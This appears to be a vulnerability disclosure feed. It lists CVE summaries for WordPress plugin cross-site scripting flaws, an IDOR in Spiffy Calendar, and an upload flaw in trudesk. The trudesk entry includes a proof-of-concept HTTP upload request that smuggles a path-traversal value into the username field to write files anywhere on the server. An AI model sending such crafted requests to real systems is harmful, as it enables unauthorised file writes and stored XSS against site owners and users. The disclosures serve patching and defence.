The Sliderby10Web WordPress plugin before 1.2.52 does not properly sanitize and escape some of its settings, which could allow high-privileged users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed

CVE-2022-1320

The Tabs WordPress plugin before 2.2.8 does not sanitise and escape Tab descriptions, which could allow high privileged users with a role as low as editor to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed

CVE-2022-1298

The Donate Extra WordPress plugin through 2.02 does not sanitise and escape a parameter before outputting it back in the response, leading to a Reflected cross-Site Scripting

CVE-2022-1268

The Gwyn's Imagemap Selector WordPress plugin through 0.3.3 does not sanitise and escape some parameters before outputting them back in attributes, leading to a Reflected Cross-Site Scripting.

CVE-2022-1221

The Domain Replace WordPress plugin through 1.3.8 does not sanitise and escape a parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting

CVE-2022-1218

The Turn off all comments WordPress plugin through 1.0 does not sanitise and escape the rows parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting

CVE-2022-1192

The XML Sitemap Generator for Google WordPress plugin before 2.0.4 does not validate a parameter which can be set to an arbitrary value, thus causing XSS via error message or RCE if allow_url_include is turned on.

CVE-2022-0346

Unrestricted Upload of File with Dangerous Type in GitHub repository polonel/trudesk prior to 1.2.2.

**Description**

The uploadImage function in accountsController take file path and extension from users . An attacker can change the path and extension to upload dangerous file to anywhere in server.

**Proof of Concept**

    1. Login 
    2. Upload profile image
    3. Capture request, modify `username` and `filename`
    

    POST /accounts/uploadImage HTTP/1.1
    Host: 192.168.20.132:8118
    Content-Length: 452
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQXoDBooqQ26crHR0
    Origin: http://192.168.20.132:8118
    Referer: http://192.168.20.132:8118/accounts
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: connect.sid=s%3A01nLIvLiz-oEhbSpekE9nwUSl9R_PQF1.GeCCIcToZnO%2BDlTis77aXBlVGyVOaQDURoUrIcrXQ%2BM; $trudesk%3Atimezone=America/New_York
    Connection: close
    
    ------WebKitFormBoundaryQXoDBooqQ26crHR0
    Content-Disposition: form-data; name="username"
    
    /../../../../../../testpathtravesal1
    ------WebKitFormBoundaryQXoDBooqQ26crHR0
    Content-Disposition: form-data; name="_id"
    
    627ce4cd7778b2c5b5f49851
    ------WebKitFormBoundaryQXoDBooqQ26crHR0
    Content-Disposition: form-data; name="image"; filename="filename.anything"
    Content-Type: image/jpeg
    
    <image content>
    ------WebKitFormBoundaryQXoDBooqQ26crHR0--
    
    

 

**Impact**

Authenticated user can upload dangerous file to anywhere in server (example: upload a file with .html extension lead to stored xss)

**Occurrences**

accounts.js L485-L505

This function take object.username into join.path() lead to path traversal, take path.extname(filename) lead to upload file with dangerous type

CVE-2022-1752: Unrestricted File Upload and Path Traversal in upload image in trudesk

Insecure Direct Object References (IDOR) vulnerability in Spiffy Plugins Spiffy Calendar <= 4.9.0 at WordPress allows an attacker to edit or delete events.

CVE-2022-29434: Spiffy Calendar

Multiple Authenticated (administrator or higher user role) Persistent Cross-Site Scripting (XSS) vulnerabilities in TMS-Plugins wpDataTables plugin <= 2.1.27 on WordPress via &data-link-text, &data-link-url, &data, &data-shortcode, &data-star-num vulnerable parameters.

Tag

#xss